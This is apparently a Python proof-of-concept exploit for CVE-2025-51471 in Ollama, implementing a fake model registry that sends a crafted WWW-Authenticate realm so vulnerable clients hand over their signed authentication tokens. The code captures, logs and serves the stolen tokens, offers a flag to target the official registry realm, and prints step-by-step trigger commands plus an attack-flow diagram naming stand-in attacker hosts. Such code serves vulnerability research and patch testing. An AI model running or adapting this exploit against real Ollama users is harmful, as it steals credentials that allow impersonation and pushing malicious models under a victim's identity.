README.md
Rendering markdown...
#!/usr/bin/env python3
"""CVE-2025-51471 - Ollama Token Theft PoC (works on all Ollama versions)"""
# Author: ajtazer
import argparse
import json
import logging
import sys
import os
import ssl
import subprocess
import tempfile
from datetime import datetime
from typing import Dict, List, Any, Optional
from dataclasses import dataclass, asdict
from flask import Flask, request, Response, jsonify
# ═══════════════════════════════════════════════════════════════════════════════
# ANSI COLOR CODES FOR TERMINAL OUTPUT
# ═══════════════════════════════════════════════════════════════════════════════
class Colors:
    """Namespace of ANSI SGR escape sequences used to style terminal output.

    Each attribute is a ready-to-print string; write ``RESET`` afterwards to
    return the terminal to its default rendering.
    """

    # Text attributes
    RESET = "\033[0m"
    BOLD = "\033[1m"
    DIM = "\033[2m"
    UNDERLINE = "\033[4m"

    # Standard-intensity foreground colors
    RED = "\033[31m"
    GREEN = "\033[32m"
    YELLOW = "\033[33m"
    BLUE = "\033[34m"
    PURPLE = "\033[35m"
    CYAN = "\033[36m"
    WHITE = "\033[37m"

    # High-intensity foreground colors
    BRIGHT_RED = "\033[91m"
    BRIGHT_GREEN = "\033[92m"
    BRIGHT_YELLOW = "\033[93m"
    BRIGHT_BLUE = "\033[94m"
    BRIGHT_PURPLE = "\033[95m"
    BRIGHT_CYAN = "\033[96m"

    # Background fills
    BG_RED = "\033[41m"
    BG_GREEN = "\033[42m"
    BG_YELLOW = "\033[43m"
# ═══════════════════════════════════════════════════════════════════════════════
# DATA STRUCTURES
# ═══════════════════════════════════════════════════════════════════════════════
@dataclass
class StolenToken:
    """One captured request that carried an ``Authorization`` header.

    All fields are strings or flat string mappings, so the record converts
    directly into a JSON-serialisable dictionary.
    """

    # Capture time; the handlers in this file pass datetime.now().isoformat().
    timestamp: str
    # Raw value of the Authorization header.
    authorization: str
    # HTTP verb of the captured request.
    method: str
    # Request location; the handlers in this file pass the full request URL.
    path: str
    # Client address as reported by the web framework.
    remote_addr: str
    # User-Agent header value, or None when the client sent none.
    user_agent: Optional[str]
    # Copy of all request headers.
    headers: Dict[str, str]
    # Copy of the URL query parameters.
    query_params: Dict[str, str]

    def to_dict(self) -> Dict[str, Any]:
        """Return the record's fields as a plain dictionary."""
        record: Dict[str, Any] = asdict(self)
        return record
@dataclass
class ServerConfig:
    """Runtime settings for the PoC server."""

    # TCP port the server listens on.
    port: int = 8080
    # URL advertised as the auth realm; derived from ``port`` when left unset.
    capture_url: Optional[str] = None
    # File that captured tokens are appended to.
    log_file: str = "stolen_tokens.json"
    # When True, the advertised realm is the official registry token endpoint.
    steal_official: bool = False
    # When True, extra per-request detail is printed.
    verbose: bool = True

    def __post_init__(self):
        """Fill in the default capture URL when the caller did not supply one."""
        if self.capture_url is not None:
            return
        self.capture_url = f"http://localhost:{self.port}/v2/token"
# ═══════════════════════════════════════════════════════════════════════════════
# GLOBAL STATE
# ═══════════════════════════════════════════════════════════════════════════════
# Flask application object; the route decorators in this file register on it.
app = Flask(__name__)
# Active settings. main() rebinds this after parsing the command line.
config: ServerConfig = ServerConfig()
# Every captured token in arrival order; appended to by log_stolen_token().
stolen_tokens: List[StolenToken] = []
# Number of requests logged so far; incremented by log_request().
request_counter: int = 0
# ═══════════════════════════════════════════════════════════════════════════════
# LOGGING & OUTPUT UTILITIES
# ═══════════════════════════════════════════════════════════════════════════════
def print_banner():
    """Print the start-up banner: title art plus a summary of the vulnerability.

    The banner is a single colorized f-string written to stdout; it takes no
    input and returns nothing.
    """
    # The literal's lines start at column 0 on purpose: leading whitespace
    # inside the triple-quoted string would become part of the output.
    banner = f"""
{Colors.BRIGHT_CYAN}╔═══════════════════════════════════════════════════════════════════════════════╗
║ ║
║ {Colors.BRIGHT_RED}██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_RED}██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_RED}██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_RED}██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_RED}╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_RED} ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ {Colors.BRIGHT_CYAN}║
║ ║
║ {Colors.BRIGHT_YELLOW} ┌─────────────────────────────────────┐ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_YELLOW} │ OLLAMA TOKEN THEFT PoC (v0.6.7) │ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_YELLOW} │ Cross-Domain Token Exposure │ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_YELLOW} └─────────────────────────────────────┘ {Colors.BRIGHT_CYAN}║
║ ║
╠═══════════════════════════════════════════════════════════════════════════════╣
║ {Colors.WHITE}Affected:{Colors.RESET} Ollama <= 0.6.7 {Colors.BRIGHT_CYAN}║
║ {Colors.WHITE}CVSS Score:{Colors.RESET} 6.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N{Colors.BRIGHT_CYAN}║
║ {Colors.WHITE}CWE:{Colors.RESET} CWE-345 (Insufficient Verification of Data Authenticity) {Colors.BRIGHT_CYAN}║
║ {Colors.WHITE}Component:{Colors.RESET} server.auth.getAuthorizationToken {Colors.BRIGHT_CYAN}║
╚═══════════════════════════════════════════════════════════════════════════════╝{Colors.RESET}
"""
    print(banner)
def print_attack_flow():
    """Print a colorized sequence diagram of the three-step request flow.

    The diagram is static text written to stdout; the function takes no input
    and returns nothing.
    """
    # The literal's lines start at column 0 on purpose: leading whitespace
    # inside the triple-quoted string would become part of the output.
    flow = f"""
{Colors.BRIGHT_YELLOW}┌─────────────────────────────────────────────────────────────────────────────┐
│ ATTACK FLOW DIAGRAM │
└─────────────────────────────────────────────────────────────────────────────┘{Colors.RESET}
{Colors.CYAN}┌─────────────┐{Colors.RESET} {Colors.RED}┌──────────────────┐{Colors.RESET}
{Colors.CYAN}│ VICTIM │{Colors.RESET} {Colors.RED}│ MALICIOUS SERVER │{Colors.RESET}
{Colors.CYAN}│ (Ollama) │{Colors.RESET} {Colors.RED}│ (This PoC) │{Colors.RESET}
{Colors.CYAN}└──────┬──────┘{Colors.RESET} {Colors.RED}└────────┬─────────┘{Colors.RESET}
│ │
│ {Colors.GREEN}1. ollama pull evil.com/model{Colors.RESET} │
├────────────────────────────────────────────────────►
│ │
│ {Colors.YELLOW}2. HTTP 401 Unauthorized{Colors.RESET} │
│ {Colors.YELLOW}WWW-Authenticate: Bearer{Colors.RESET} │
│ {Colors.RED}realm="https://attacker.com/steal-token"{Colors.RESET} │
◄────────────────────────────────────────────────────┤
│ │
│ {Colors.BRIGHT_RED}3. Ollama follows realm WITHOUT validation!{Colors.RESET} │
│ {Colors.BRIGHT_RED}Sends Ed25519 signed token to attacker{Colors.RESET} │
├────────────────────────────────────────────────────►
│ │
│ {Colors.BG_RED}{Colors.WHITE} TOKEN CAPTURED! {Colors.RESET} │
│ │
▼ ▼
"""
    print(flow)
def print_section(title: str, color: str = Colors.BRIGHT_CYAN):
    """Print ``title`` framed by two horizontal rules.

    Args:
        title: Text shown between the rules.
        color: Escape sequence applied from the opening rule until the reset
            emitted after the closing rule.
    """
    rule = "═" * 77
    print(f"\n{color}{rule}")
    print(f" {title}")
    print(f"{rule}{Colors.RESET}\n")
def print_info(label: str, value: str, indent: int = 4):
    """Print one ``label: value`` row drawn with a mid-list tree connector.

    Args:
        label: Field name, shown in yellow.
        value: Text shown after the label.
        indent: Number of spaces printed before the connector.
    """
    pad = " " * indent
    connector = f"{Colors.DIM}├──{Colors.RESET}"
    print(f"{pad}{connector} {Colors.YELLOW}{label}:{Colors.RESET} {value}")
def print_last_info(label: str, value: str, indent: int = 4):
    """Print one ``label: value`` row drawn with the closing tree connector.

    Args:
        label: Field name, shown in yellow.
        value: Text shown after the label.
        indent: Number of spaces printed before the connector.
    """
    pad = " " * indent
    connector = f"{Colors.DIM}└──{Colors.RESET}"
    print(f"{pad}{connector} {Colors.YELLOW}{label}:{Colors.RESET} {value}")
def print_headers(headers: Dict[str, str], indent: int = 8):
    """Print a header mapping as a tree, one ``name: value`` row per entry.

    Args:
        headers: Header names mapped to their values.
        indent: Number of spaces printed before each connector.
    """
    pad = " " * indent
    last_index = len(headers) - 1
    for position, (name, raw) in enumerate(headers.items()):
        connector = "└──" if position == last_index else "├──"
        # Values of 60+ characters are cut to 57 characters plus an ellipsis.
        shown = raw if len(raw) < 60 else raw[:57] + "..."
        print(f"{pad}{Colors.DIM}{connector}{Colors.RESET} {Colors.BLUE}{name}:{Colors.RESET} {shown}")
def log_stolen_token(token: StolenToken):
    """Record a captured token: store it, print it, and append it to the log.

    The token is appended to the module-level ``stolen_tokens`` list, a
    formatted report is written to stdout, and, when ``config.log_file`` is
    set, the token is appended to that file as indented JSON followed by a
    ``---`` separator line.

    The log file holds live credentials, so it is created with owner-only
    permissions (0600) and written as UTF-8. A file that already exists keeps
    whatever permissions it has.

    Args:
        token: The captured request record.

    Failures while writing the log file are reported on stdout and do not
    propagate, so a full disk or bad path never breaks request handling.
    """
    # Appending mutates the shared list in place, so no ``global`` is needed.
    stolen_tokens.append(token)
    token_num = len(stolen_tokens)

    # Capture notification
    print(f"\n{Colors.BG_RED}{Colors.WHITE}{Colors.BOLD}")
    print(" ╔═══════════════════════════════════════════════════════════════════════╗")
    print(f" ║ 🔓 TOKEN #{token_num} CAPTURED! 🔓 ║")
    print(" ╚═══════════════════════════════════════════════════════════════════════╝")
    print(f"{Colors.RESET}\n")

    # Request metadata
    print(f" {Colors.BRIGHT_GREEN}┌─────────────────────────────────────────────────────────────────────┐{Colors.RESET}")
    print(f" {Colors.BRIGHT_GREEN}│{Colors.RESET} {Colors.BOLD}STOLEN TOKEN DETAILS{Colors.RESET} {Colors.BRIGHT_GREEN}│{Colors.RESET}")
    print(f" {Colors.BRIGHT_GREEN}└─────────────────────────────────────────────────────────────────────┘{Colors.RESET}")
    print_info("Timestamp", token.timestamp)
    print_info("Remote Address", token.remote_addr)
    print_info("HTTP Method", token.method)
    print_info("Request Path", token.path)
    print_info("User-Agent", token.user_agent or "N/A")
    print()

    # Authorization header value
    print(f" {Colors.BRIGHT_RED}┌─────────────────────────────────────────────────────────────────────┐{Colors.RESET}")
    print(f" {Colors.BRIGHT_RED}│{Colors.RESET} {Colors.BOLD}AUTHORIZATION TOKEN (Ed25519 Signed){Colors.RESET} {Colors.BRIGHT_RED}│{Colors.RESET}")
    print(f" {Colors.BRIGHT_RED}└─────────────────────────────────────────────────────────────────────┘{Colors.RESET}")

    # Wrap the value at 70 characters. An empty value still yields one
    # (empty) row, and only the first row is preceded by a blank line.
    auth_token = token.authorization
    chunks = [auth_token[i:i + 70] for i in range(0, len(auth_token), 70)] or [auth_token]
    for index, chunk in enumerate(chunks):
        lead = "\n" if index == 0 else ""
        print(f"{lead} {Colors.GREEN}{chunk}{Colors.RESET}")
    print()

    # Full header dump only in verbose mode
    if config.verbose and token.headers:
        print(f" {Colors.CYAN}┌─────────────────────────────────────────────────────────────────────┐{Colors.RESET}")
        print(f" {Colors.CYAN}│{Colors.RESET} {Colors.BOLD}ALL REQUEST HEADERS{Colors.RESET} {Colors.CYAN}│{Colors.RESET}")
        print(f" {Colors.CYAN}└─────────────────────────────────────────────────────────────────────┘{Colors.RESET}")
        print_headers(token.headers)
    print(f"\n{'─' * 77}\n")

    # File logging
    if config.log_file:
        try:
            # os.open lets the file be created as 0600 instead of the
            # umask default; O_APPEND keeps earlier records intact.
            fd = os.open(
                config.log_file,
                os.O_WRONLY | os.O_APPEND | os.O_CREAT,
                0o600,
            )
            with os.fdopen(fd, "a", encoding="utf-8") as f:
                json.dump(token.to_dict(), f, indent=2)
                f.write("\n---\n")
        except (OSError, TypeError, ValueError) as e:
            # OSError: path/permission/disk problems; TypeError/ValueError:
            # a record that json cannot serialise.
            print(f" {Colors.RED}[✗] Error writing to log file: {e}{Colors.RESET}\n")
        else:
            if config.verbose:
                print(f" {Colors.DIM}[✓] Token saved to {config.log_file}{Colors.RESET}\n")
def log_request(method: str, path: str, remote_addr: str, description: str, color: str = Colors.BLUE):
    """Print a boxed summary of an incoming request and bump the counter.

    Args:
        method: HTTP verb of the request.
        path: Request location to display.
        remote_addr: Client address to display.
        description: Short note explaining what the request is.
        color: Escape sequence used for the box outline.
    """
    global request_counter
    request_counter += 1

    # Wall-clock time, trimmed from microseconds to milliseconds.
    stamp = datetime.now().strftime("%H:%M:%S.%f")[:-3]
    edge = f"{color}│{Colors.RESET}"
    rows = (
        f"\n{color}┌─ REQUEST #{request_counter} {'─' * 60}{Colors.RESET}",
        f"{edge} {Colors.DIM}[{stamp}]{Colors.RESET} {Colors.BOLD}{method}{Colors.RESET} {path}",
        f"{edge} {Colors.DIM}From:{Colors.RESET} {remote_addr}",
        f"{edge} {Colors.DIM}Description:{Colors.RESET} {description}",
        f"{color}└{'─' * 70}{Colors.RESET}",
    )
    for row in rows:
        print(row)
# ═══════════════════════════════════════════════════════════════════════════════
# FLASK ROUTE HANDLERS
# ═══════════════════════════════════════════════════════════════════════════════
@app.route('/v2/', defaults={'path': ''})
@app.route('/v2/<path:path>')
def registry_handler(path):
    """
    Handle requests to the fake OCI/Docker registry.

    This endpoint simulates a malicious registry that exploits CVE-2025-51471
    by returning a 401 response with a crafted WWW-Authenticate header containing
    a malicious realm URL.

    ATTACK MECHANISM:
    1. Ollama sends a request to pull a model
    2. We return 401 with WWW-Authenticate header pointing to our token capture endpoint
    3. Ollama (vulnerable version) follows the realm URL without domain validation
    4. We capture the Ed25519 signed authentication token

    Args:
        path: Remainder of the URL after ``/v2/`` (empty for ``/v2/`` itself).
            It is not read by the body; the full URL comes from ``request``.

    Returns:
        A 418 JSON response when the request carries an Authorization header
        (after recording it), otherwise a 401 JSON response whose
        WWW-Authenticate header names the configured realm.
    """
    log_request(
        request.method,
        request.url,
        request.remote_addr,
        "Fake registry request - checking for auth token",
        Colors.BLUE
    )
    # Verbose header logging
    if config.verbose:
        print(f"\n {Colors.DIM}Request Headers:{Colors.RESET}")
        for key, value in request.headers:
            # Each value is cut to 50 characters for display only.
            print(f" {Colors.DIM}•{Colors.RESET} {key}: {value[:50]}{'...' if len(value) > 50 else ''}")
    # Check for Authorization header
    auth_header = request.headers.get('Authorization')
    if auth_header:
        # 🎯 TOKEN RECEIVED! This is the payload we're after!
        print(f"\n {Colors.BRIGHT_GREEN}[★] Authorization header detected!{Colors.RESET}")
        print(f" {Colors.BRIGHT_GREEN}[★] Preparing to capture token...{Colors.RESET}")
        token = StolenToken(
            timestamp=datetime.now().isoformat(),
            authorization=auth_header,
            method=request.method,
            path=request.url,
            remote_addr=request.remote_addr,
            user_agent=request.headers.get('User-Agent'),
            headers=dict(request.headers),
            query_params=dict(request.args)
        )
        log_stolen_token(token)
        # Return 418 I'm a teapot as an indicator that capture succeeded
        # This is a fun Easter egg status code that clearly shows the PoC worked
        return Response(
            json.dumps({
                "message": "Token captured successfully",
                "status": "pwned",
                "token_number": len(stolen_tokens)
            }, indent=2),
            status=418,
            content_type='application/json'
        )
    # No auth header - this is the initial request
    # Send 401 with malicious WWW-Authenticate header
    print(f"\n {Colors.YELLOW}[!] No Authorization header found{Colors.RESET}")
    print(f" {Colors.YELLOW}[!] Sending malicious WWW-Authenticate response...{Colors.RESET}")
    # Determine the realm URL
    if config.steal_official:
        realm = "https://registry.ollama.ai/v2/token"
        print(f"\n {Colors.BRIGHT_RED}[⚠] STEALING OFFICIAL OLLAMA REGISTRY TOKENS!{Colors.RESET}")
        print(f" {Colors.BRIGHT_RED}[⚠] Redirecting auth to: {realm}{Colors.RESET}")
    else:
        realm = config.capture_url
        print(f"\n {Colors.PURPLE}[→] Redirecting auth to our capture endpoint:{Colors.RESET}")
        print(f" {Colors.PURPLE} {realm}{Colors.RESET}")
    # Craft the malicious WWW-Authenticate header
    # This is the heart of the exploit - Ollama will follow this realm URL blindly
    www_auth = f'Bearer realm="{realm}",service="ollama",scope="repository:malicious/model:pull"'
    print(f"\n {Colors.CYAN}[→] WWW-Authenticate header:{Colors.RESET}")
    print(f" {Colors.CYAN} {www_auth}{Colors.RESET}")
    # Craft a realistic-looking registry error response
    error_response = {
        "errors": [{
            "code": "UNAUTHORIZED",
            "message": "authentication required",
            "detail": {
                "reason": "access to the requested resource is not authorized",
                "realm": realm
            }
        }]
    }
    response = Response(
        json.dumps(error_response, indent=2),
        status=401,
        content_type='application/json'
    )
    response.headers['WWW-Authenticate'] = www_auth
    response.headers['Docker-Distribution-Api-Version'] = 'registry/2.0'
    # NOTE: these messages print before the response object is returned,
    # i.e. before the framework actually transmits it.
    print(f"\n {Colors.GREEN}[✓] 401 response sent with malicious realm{Colors.RESET}")
    print(f" {Colors.DIM}[...] Waiting for Ollama to follow the redirect...{Colors.RESET}")
    return response
@app.route('/steal-token')
@app.route('/token')
@app.route('/v2/token')
def token_capture_handler():
    """
    Token capture endpoint.

    This is where Ollama sends the signed Ed25519 authentication token
    after following our malicious realm URL.

    The token is in the Authorization header and contains:
    - The user's identity
    - Ed25519 signature
    - Scope information

    With this token, an attacker could:
    - Access private models the victim has access to
    - Push malicious models under the victim's identity
    - Impersonate the victim on registry.ollama.ai

    Returns:
        A ``(json_response, 401)`` pair reporting the running count of
        captured tokens. The same body is returned whether or not the request
        carried an Authorization header.
    """
    log_request(
        request.method,
        request.url,
        request.remote_addr,
        "🎯 TOKEN CAPTURE ENDPOINT HIT!",
        Colors.BRIGHT_GREEN
    )
    auth_header = request.headers.get('Authorization')
    if auth_header:
        print(f"\n {Colors.BG_GREEN}{Colors.WHITE} SUCCESS! Token received at capture endpoint! {Colors.RESET}")
        token = StolenToken(
            timestamp=datetime.now().isoformat(),
            authorization=auth_header,
            method=request.method,
            path=request.url,
            remote_addr=request.remote_addr,
            user_agent=request.headers.get('User-Agent'),
            headers=dict(request.headers),
            query_params=dict(request.args)
        )
        log_stolen_token(token)
    else:
        print(f"\n {Colors.YELLOW}[!] Request received but no Authorization header{Colors.RESET}")
        print(f" {Colors.DIM} This might be a probe or the attack flow wasn't triggered{Colors.RESET}")
    # Return 401 - the token capture is complete
    # We don't need to return a valid token since we already captured what we need
    # NOTE(review): the message below claims a capture even on the
    # no-Authorization path above - confirm whether that is intended.
    return jsonify({
        "error": "token_capture_complete",
        "message": "Your token has been captured. This is a PoC for CVE-2025-51471.",
        "captured_tokens": len(stolen_tokens)
    }), 401
@app.route('/health')
def health_handler():
    """Report server status, counters, and the active configuration as JSON."""
    settings = {
        "port": config.port,
        "capture_url": config.capture_url,
        "steal_official": config.steal_official,
        "verbose": config.verbose
    }
    status = {
        "status": "running",
        "vulnerability": "CVE-2025-51471",
        "affected_version": "Ollama <= 0.6.7",
        "tokens_captured": len(stolen_tokens),
        "total_requests": request_counter,
        "server_time": datetime.now().isoformat(),
        "config": settings
    }
    return jsonify(status)
@app.route('/tokens')
def tokens_handler():
    """Return all captured tokens as JSON, to loopback clients only.

    The server listens on every interface, so without a check any host that
    can reach the port could download the captured credentials. Requests whose
    client address is not a loopback address receive a 403 instead.

    Returns:
        A JSON response with ``total`` and ``tokens`` for loopback clients,
        or a ``(json_response, 403)`` pair for everyone else.
    """
    # Function-scope import keeps this block self-contained.
    import ipaddress

    try:
        client = ipaddress.ip_address(request.remote_addr or "")
    except ValueError:
        # Missing or unparsable address: treat as non-local.
        client = None

    # An IPv4 client on a dual-stack socket appears as ::ffff:a.b.c.d;
    # unwrap it so 127.0.0.1 is recognised as loopback in that form too.
    mapped = getattr(client, "ipv4_mapped", None)
    if mapped is not None:
        client = mapped

    if client is None or not client.is_loopback:
        return jsonify({
            "error": "forbidden",
            "message": "Captured tokens are only served to loopback clients."
        }), 403

    return jsonify({
        "total": len(stolen_tokens),
        "tokens": [t.to_dict() for t in stolen_tokens]
    })
@app.route('/')
def index_handler():
    """Serve a plain-text status page listing counters, endpoints, and usage."""
    # The literal's lines start at column 0 on purpose: leading whitespace
    # inside the triple-quoted string would become part of the page.
    page = f"""
╔═══════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-51471 - Ollama Token Theft PoC ║
║ Cross-Domain Authentication Token Exposure Server ║
╚═══════════════════════════════════════════════════════════════════════════════╝
STATUS: RUNNING
TOKENS CAPTURED: {len(stolen_tokens)}
REQUESTS HANDLED: {request_counter}
ENDPOINTS:
/v2/* - Fake registry (triggers exploit)
/v2/token - Token capture endpoint
/steal-token - Alternative token capture endpoint
/tokens - View all captured tokens (JSON)
/health - Server health check
EXPLOIT TRIGGER:
curl http://localhost:11434/api/pull -d '{{"model": "http://localhost:{config.port}/malicious/model"}}'
OR
ollama pull localhost:{config.port}/malicious/model
For more information, see: https://github.com/ollama/ollama/pull/10750
"""
    return Response(page, content_type='text/plain')
# ═══════════════════════════════════════════════════════════════════════════════
# SSL CERTIFICATE GENERATION
# ═══════════════════════════════════════════════════════════════════════════════
def generate_self_signed_cert(cert_dir: Optional[str] = None) -> tuple:
    """
    Generate a self-signed SSL certificate for the HTTPS server.

    The certificate and key are produced by the ``openssl`` command-line
    tool. A 4096-bit key with a subjectAltName extension is tried first; if
    that command fails (for example on an OpenSSL too old to know
    ``-addext``), a 2048-bit key without the extension is tried instead.

    Args:
        cert_dir: Directory to write ``server.crt`` and ``server.key`` into.
            It is created if missing. When None, a fresh temporary directory
            is used; that directory is not removed by this function.

    Returns:
        tuple: ``(cert_path, key_path)`` on success, or ``(None, None)`` when
        ``openssl`` is missing or every attempt fails. Failures are reported
        on stdout rather than raised.
    """
    if cert_dir is None:
        cert_dir = tempfile.mkdtemp(prefix="cve-2025-51471-")
    cert_path = os.path.join(cert_dir, "server.crt")
    key_path = os.path.join(cert_dir, "server.key")
    print(f"\n{Colors.YELLOW}[*] Generating self-signed SSL certificate...{Colors.RESET}")

    def build_command(key_spec: str, extra: List[str]) -> List[str]:
        """Assemble one ``openssl req`` invocation for the given key size."""
        return [
            "openssl", "req", "-x509", "-newkey", key_spec,
            "-keyout", key_path,
            "-out", cert_path,
            "-days", "365",
            "-nodes",  # No passphrase
            "-subj", "/CN=localhost/O=CVE-2025-51471-PoC/C=US",
            *extra,
        ]

    attempts = (
        build_command("rsa:4096", ["-addext", "subjectAltName=DNS:localhost,IP:127.0.0.1"]),
        # Fallback without -addext for older OpenSSL versions
        build_command("rsa:2048", []),
    )

    try:
        # A caller-supplied directory may not exist yet.
        os.makedirs(cert_dir, exist_ok=True)
        result = None
        for cmd in attempts:
            result = subprocess.run(cmd, capture_output=True, text=True)
            if result.returncode == 0:
                break
        else:
            # Every attempt failed; report the stderr of the last one.
            raise RuntimeError(f"OpenSSL failed: {result.stderr}")
    except FileNotFoundError:
        print(f"{Colors.RED}[✗] OpenSSL not found! Please install OpenSSL.{Colors.RESET}")
        print(f"{Colors.YELLOW}[!] Falling back to HTTP mode (may not work with Ollama){Colors.RESET}")
        return None, None
    except (OSError, RuntimeError) as e:
        print(f"{Colors.RED}[✗] Failed to generate certificate: {e}{Colors.RESET}")
        print(f"{Colors.YELLOW}[!] Falling back to HTTP mode (may not work with Ollama){Colors.RESET}")
        return None, None

    print(f"{Colors.GREEN}[✓] SSL certificate generated successfully{Colors.RESET}")
    print(f"{Colors.DIM} ├── Certificate: {cert_path}{Colors.RESET}")
    print(f"{Colors.DIM} └── Private Key: {key_path}{Colors.RESET}")
    return cert_path, key_path
# ═══════════════════════════════════════════════════════════════════════════════
# MAIN ENTRY POINT
# ═══════════════════════════════════════════════════════════════════════════════
def _build_arg_parser() -> argparse.ArgumentParser:
    """Build the command-line parser for the PoC server."""
    parser = argparse.ArgumentParser(
        description='CVE-2025-51471 - Ollama Token Theft PoC Server',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
EXAMPLES:
# Basic usage (localhost token capture)
python3 malicious_registry.py
# Custom port
python3 malicious_registry.py --port 9000
# Steal official Ollama registry tokens
python3 malicious_registry.py --steal-official
# Minimal output
python3 malicious_registry.py --no-verbose
MORE INFORMATION:
Vulnerability: CVE-2025-51471
Affected: Ollama <= 0.6.7
Fix: https://github.com/ollama/ollama/pull/10750
"""
    )
    parser.add_argument(
        '--port', '-p',
        type=int,
        default=8080,
        help='Port to listen on (default: 8080)'
    )
    parser.add_argument(
        '--capture-url', '-c',
        type=str,
        default=None,
        help='URL for token capture endpoint '
             '(default: PROTOCOL://localhost:PORT/v2/token, where PROTOCOL is '
             'https unless --no-ssl/--insecure is given)'
    )
    parser.add_argument(
        '--log', '-l',
        type=str,
        default='stolen_tokens.json',
        help='File to log stolen tokens (default: stolen_tokens.json)'
    )
    parser.add_argument(
        '--steal-official', '-s',
        action='store_true',
        help='Redirect to steal registry.ollama.ai tokens (DANGEROUS)'
    )
    # Kept for command-line compatibility: verbosity is on by default and is
    # switched off only by --no-verbose, so this flag changes nothing.
    parser.add_argument(
        '--verbose', '-v',
        action='store_true',
        default=True,
        help='Enable verbose output (default: True)'
    )
    parser.add_argument(
        '--no-verbose',
        action='store_true',
        help='Disable verbose output'
    )
    parser.add_argument(
        '--no-ssl',
        action='store_true',
        help='Disable HTTPS (use HTTP only - may not work with Ollama)'
    )
    parser.add_argument(
        '--insecure',
        action='store_true',
        help='Same as --no-ssl'
    )
    return parser


def main():
    """Parse the command line, print the start-up report, and run the server.

    Rebinds the module-level ``config`` from the parsed arguments. HTTPS is
    used unless ``--no-ssl``/``--insecure`` is given; if certificate
    generation fails, the server falls back to HTTP. In that fallback the
    default capture URL is switched to ``http://``, but a URL the user passed
    with ``--capture-url`` is left exactly as given.

    Blocks until the server stops; Ctrl+C prints a short summary.
    """
    global config
    args = _build_arg_parser().parse_args()
    use_ssl = not (args.no_ssl or args.insecure)
    protocol = "https" if use_ssl else "http"
    # Build configuration
    config = ServerConfig(
        port=args.port,
        capture_url=args.capture_url or f"{protocol}://localhost:{args.port}/v2/token",
        log_file=args.log,
        steal_official=args.steal_official,
        verbose=not args.no_verbose
    )
    # Print banner and info
    print_banner()
    print_attack_flow()
    # Generate SSL certificate if needed
    cert_path, key_path = None, None
    if use_ssl:
        cert_path, key_path = generate_self_signed_cert()
        if cert_path is None:
            use_ssl = False
            protocol = "http"
            # Only the derived default follows the protocol downgrade; an
            # explicit --capture-url must not be overwritten.
            if args.capture_url is None:
                config.capture_url = f"http://localhost:{config.port}/v2/token"
    print_section("SERVER CONFIGURATION")
    print(f" {Colors.DIM}┌{'─' * 68}┐{Colors.RESET}")
    print_info("Listen Port", str(config.port))
    print_info("Protocol", f"{Colors.GREEN}HTTPS (SSL){Colors.RESET}" if use_ssl else f"{Colors.YELLOW}HTTP{Colors.RESET}")
    print_info("Token Capture URL", config.capture_url)
    print_info("Log File", config.log_file)
    print_info("Steal Official Tokens", f"{Colors.RED}YES{Colors.RESET}" if config.steal_official else f"{Colors.GREEN}NO{Colors.RESET}")
    print_last_info("Verbose Mode", f"{Colors.GREEN}ON{Colors.RESET}" if config.verbose else f"{Colors.YELLOW}OFF{Colors.RESET}")
    print(f" {Colors.DIM}└{'─' * 68}┘{Colors.RESET}")
    if config.steal_official:
        print(f"\n{Colors.BG_RED}{Colors.WHITE}{Colors.BOLD}")
        print(" ⚠️ WARNING: STEALING OFFICIAL OLLAMA REGISTRY TOKENS!")
        print(" ⚠️ This will redirect auth flows to registry.ollama.ai")
        print(" ⚠️ Use responsibly and only for authorized security testing!")
        print(f"{Colors.RESET}")
    if use_ssl:
        print(f"\n{Colors.YELLOW}[!] IMPORTANT: Ollama needs to trust our self-signed certificate.{Colors.RESET}")
        print(f"{Colors.YELLOW} You may need to add the certificate to your system trust store,{Colors.RESET}")
        print(f"{Colors.YELLOW} OR restart this server with --no-ssl and use ollama's --insecure flag.{Colors.RESET}")
    print_section("ATTACK INSTRUCTIONS")
    if use_ssl:
        print(f"""
{Colors.BRIGHT_RED}⚠️ HTTPS MODE - Certificate trust required{Colors.RESET}
{Colors.YELLOW}Option A:{Colors.RESET} Add the generated cert to your system keychain (macOS/Linux)
{Colors.YELLOW}Option B (RECOMMENDED):{Colors.RESET} Use HTTP mode instead:
{Colors.CYAN}$ python3 malicious_registry.py --no-ssl{Colors.RESET}
Then: {Colors.CYAN}$ ollama pull --insecure localhost:{config.port}/malicious/model{Colors.RESET}
""")
    else:
        print(f"""
{Colors.BRIGHT_GREEN}✓ HTTP MODE - Use --insecure flag with ollama{Colors.RESET}
{Colors.YELLOW}1.{Colors.RESET} Ensure Ollama is running:
{Colors.CYAN}$ ollama serve{Colors.RESET}
{Colors.YELLOW}2.{Colors.RESET} Trigger the vulnerability using the --insecure flag:
{Colors.BOLD}Method A - Using ollama CLI (RECOMMENDED):{Colors.RESET}
{Colors.CYAN}$ ollama pull --insecure localhost:{config.port}/malicious/model{Colors.RESET}
{Colors.BOLD}Method B - Using curl API:{Colors.RESET}
{Colors.CYAN}$ curl http://localhost:11434/api/pull -d '{{"model": "localhost:{config.port}/malicious/model", "insecure": true}}'{Colors.RESET}
{Colors.YELLOW}3.{Colors.RESET} Watch this terminal for captured tokens!
{Colors.YELLOW}4.{Colors.RESET} View all captured tokens:
{Colors.CYAN}$ curl http://localhost:{config.port}/tokens{Colors.RESET}
""")
    print_section(f"SERVER STARTING ON PORT {config.port} ({protocol.upper()})")
